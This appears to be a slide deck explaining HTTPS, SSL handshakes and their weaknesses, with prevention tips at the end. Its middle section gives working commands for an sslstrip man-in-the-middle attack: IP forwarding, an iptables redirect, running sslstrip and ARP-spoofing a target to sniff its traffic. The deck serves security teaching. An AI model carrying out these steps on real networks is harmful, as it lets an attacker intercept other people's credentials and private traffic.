Man-in-the-Middle Attack on SSL
HTTP vs HTTPS?
Instead of HyperText Transfer Protocol (HTTP), this website uses HyperText Transfer Protocol Secure (HTTPS). Using HTTPS, the computers agree on a "code"between them, and then they scramble the messages using that "code" so that no one in between can read them. This keeps your information safe from hackers.
How SSL Works?
A browser or server attempts to connect to a website (i.e. a web server) secured with SSL.
The browser/server requests that the web server identify itself.The web server sends the browser/server a copy of its SSL certificate.
The browser/server checks to see whether or not it trusts the SSL certificate. If so, it sends a message to the web server.
The web server sends back a digitally signed acknowledgement to start an SSL encrypted session.Encrypted data is shared between the browser/server and the web server.
Common SSL Misconceptions
HTTPS means I am secure right?
−SSL version 2.0 flaws
−Weak Ciphers < 128 bit
−Certificate keys < 1024 bits
SSL can provide a false sense of security
Common HTTP/HTTPS Connection
Using SSL Strip
1. Get sslstrip
A. Download and install sslstrip and arpspoof (linux only)
B. Get Kali Linux
2. Configure attack machine for IP forwarding.
echo “1” > /proc/sys/net/ipv4/ip_forward
3. Route all HTTP traffic to sslstrip.
iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 54321
4. Run sslstrip.
sslstrip –l 54321
5. Configure ARP spoofing.
arpspoof –i eth0 –t <targetIP> <gatewayIP>
6. Launch a sniffer and collect data.
Expanding the attack
What if a root certificate could be installed on the target?
The attacker could potentially replace the certificate and maintain a secure connection.
Preventing SSL Spoofing
Ensure you are using secure connections. Look for the HTTPS.
Be careful about where you use secure sites.
Secure machines on the network.
Use static ARP tables.*